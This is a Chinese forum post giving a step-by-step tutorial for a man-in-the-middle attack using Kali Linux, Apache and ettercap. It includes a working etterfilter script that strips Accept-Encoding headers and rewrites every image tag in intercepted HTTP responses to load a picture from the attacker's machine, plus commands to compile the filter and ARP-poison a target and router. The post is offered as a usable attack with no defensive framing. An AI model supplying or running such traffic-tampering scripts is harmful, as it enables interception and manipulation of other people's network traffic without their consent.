|
|
一:先准备一张图片
恩恩!低调点好!
我们将图片放大kali的var/www/html目录下
二:启动Apache
[pre]
servce apache2 start[/pre]
三:编写攻击脚本
[pre]
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
#msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=http://192.168.5.209/img.jpg/&' ");
replace("IMG SRC=", "img src=http:/192.168.5.209/img.jpg/&' ");
msg("过滤执行.\n");
}
[/pre]
然后另存为alert.filter文件
四:将alert.filter转变为二进制文件
[pre]
etterfilter alert.filter -o alert.ef
[/pre]
五:利用ettercap进行中间人攻击
将目标添加为1 路由器自身添加为2
然后我们载入刚才生成的脚本
然后开始中间人攻击
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有账号?注册
×
|
[复制链接]
发表于 2018-5-27 19:00:04
发表于 2018-5-27 23:20:25
